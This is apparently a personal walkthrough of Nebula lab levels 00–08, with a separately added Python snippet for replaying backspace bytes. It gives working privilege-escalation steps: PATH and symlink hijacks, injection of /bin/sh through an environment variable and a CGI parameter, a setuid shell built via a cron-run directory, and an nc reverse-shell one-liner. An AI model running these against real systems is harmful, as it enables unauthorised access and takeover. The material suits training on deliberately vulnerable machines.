I've been having a go at Nebula just for the lulz, and it seems like an interesting VM since it covers a gamut of vulnerabilities ranging from crappy PATH issues to the cool Python pickle functions. I thought a write-up was due even though I've seen countless versions online; just for the feeling of satisfaction and to archive the way I did it (to laugh at myself years later).

NOW, if you are like me and connecting to your VM via ssh, there is a high probability that you will encounter the following error: "Couldn't agree on a host key algorithm (available: ecdsa-sha2-nistp256)" or something along those lines. Not to worry; do the following to generate a fresh ssh host keypair. Log in to the nebula account, then:

cd /etc/ssh
sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
sudo vi /etc/ssh/sshd_config
(uncomment this line if it is commented: HostKey /etc/ssh/ssh_host_dsa_key)
sudo chgrp ssh_keys ssh_host_dsa_key
sudo service sshd restart

Now that's out of the way ->

Level00

Pretty straightforward, more probably a warm-up exercise. Asks you to find an executable with the setuid bit set for user flag00.


find / -perm /u=s -user flag00 2>/dev/null
/bin/.../flag00
/rofs/bin/.../flag00
level00@nebula:~$ /rofs/bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

Level01

This is a straightforward PATH manipulation trick.


So I created a symbolic link
ln -s /bin/getflag /tmp/echo
and changed the path with
PATH=/tmp:$PATH
This puts /tmp first in the list of directories the system searches for echo, which is similar to Windows DLL hijacking. Once you run the flag01 executable you should get the flag.

Level02

Once again it does an echo based on the env variable USER; we can manipulate it with something like the below:


USER='hi;/bin/sh;'
export USER
This is a lazy man's way of getting the program to execute a shell, but once again you get a shell running in the context of flag02. Run your getflag for the win :P

Level03

The flag03 folder shows a bash script and a writable directory; anything dropped in that directory gets executed and then removed :) What I did was create a shell script called crap in writable.d and a C program which invoked a bash shell with uid, gid etc. set to 996 (you can get the uid of flag03 with cat /etc/passwd). My "crap" file in writable.d looked like this (cat crap):


#!/bin/sh
gcc -o /home/flag03/flagzuser /tmp/run.c; chmod +s,a+rwx /home/flag03/flagzuser

Once writable.sh runs, you get an executable with the setuid bit set. Run it and execute getflag.

Level04

This is a fun one too. Looking at the source code you can see that the program refuses to read the file called "token", but that's where our flag is -_- . Symbolic linking time!!


ln -s /home/flag04/token /tmp/crap
Then run
./flag04 /tmp/crap
You should get a token
06508b5e-8909-4f38-b630-fdb148a848a2
Level05

This one actually reflects what might happen when you get a shell during a pentest. A pentester's dream would be to use that uber cool remote exploit to one-shot and get a remote # shell, but most privilege escalations happen by poking around and finding a misconfiguration, or in this case ssh keys :p Doing an ls -al shows a nice juicy directory called .backup

I extracted the tgz file into /tmp/flag05:
mkdir -p /tmp/flag05
tar xvzf backup-19072011.tgz -C /tmp/flag05/
then went to /tmp/flag05/.ssh and ran
ssh -i id_rsa flag05@127.0.0.1
You should be able to run getflag ;)

Flag06

The hint on the site says it's a legacy Unix system challenge, so look at /etc/passwd. Notice that flag06 has a hash in its entry; take the hash, crack it with John the Ripper and get flag06's password, which is hello ??? getflag ! :)

Flag07

The thttpd conf file shows that it runs an HTTP server on port 7007. If you connect to index.cgi it shows a ping usage, and as per the source code you get to pass a variable called Host to the CGI script. I passed ?Host=localhost and got the results back. Tried ?Host=localhost;id but it didn't work since you need to encode the ; as %3B (URL encoding). Now that I see that the id is flag07, I passed the following: ?Host=localhost%3Bgetflag, which displayed the flag information. You could probably go about it a cooler way by URL-encoding a command for a reverse shell back to your attacking VM :)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f
^ Stolen from pentestmonkey's reverse shell one-liner :P

Make sure you encode the command before sending it across!

Flag08

I learned something from this flag too -> 0x7f = backspace. If you do tcpdump -qns 0 -A -r capture.pcap, or transfer the pcap to Wireshark and view it in hex view, you will see that there are a couple of 0x7f bytes (shown as .) after "backdoor", so essentially the password becomes backd00Rmate. Do su flag08 with password backd00Rmate. You should get your flag.
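To see why the bytes on the wire differ from the password that was actually typed, here is an added example (not from the original post and not Nebula's own code) that replays a cleartext terminal byte stream with backspace semantics; the sample bytes are constructed, not taken from capture.pcap.

```python
# Reconstruct what a user actually typed from a raw cleartext byte stream,
# honouring the DEL (0x7f) and BS (0x08) control bytes a terminal emits when
# the user presses Backspace. This is the Level08 observation in code: the
# capture shows "backdoor" followed by 0x7f bytes, so the literal bytes are
# not the effective password.

DEL = 0x7F   # what most modern terminals send for the Backspace key
BS = 0x08    # the legacy ASCII backspace


def reconstruct_typed(stream: bytes) -> str:
    """Apply backspace semantics to a byte stream and return the text that results."""
    buf = []
    for b in stream:
        if b in (DEL, BS):
            if buf:              # deleting on an empty line is a no-op, as on a terminal
                buf.pop()
        elif b in (0x0D, 0x0A):  # CR / LF end the line and are not part of the text
            continue
        else:
            buf.append(chr(b))
    return "".join(buf)


# Constructed sample (not the bytes from the real capture.pcap): the typist writes
# "backdoor", deletes three characters, continues, and fixes one more typo.
SAMPLE = b"backdoor\x7f\x7f\x7f00Rm8\x7fate\r\n"

if __name__ == "__main__":
    print(reconstruct_typed(SAMPLE))  # backd00Rmate
```

The same routine applied to a telnet or other cleartext session carved out of a capture shows why such protocols leak credentials even when the raw bytes look like a typo.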

Flag 09-Flag18 in the next part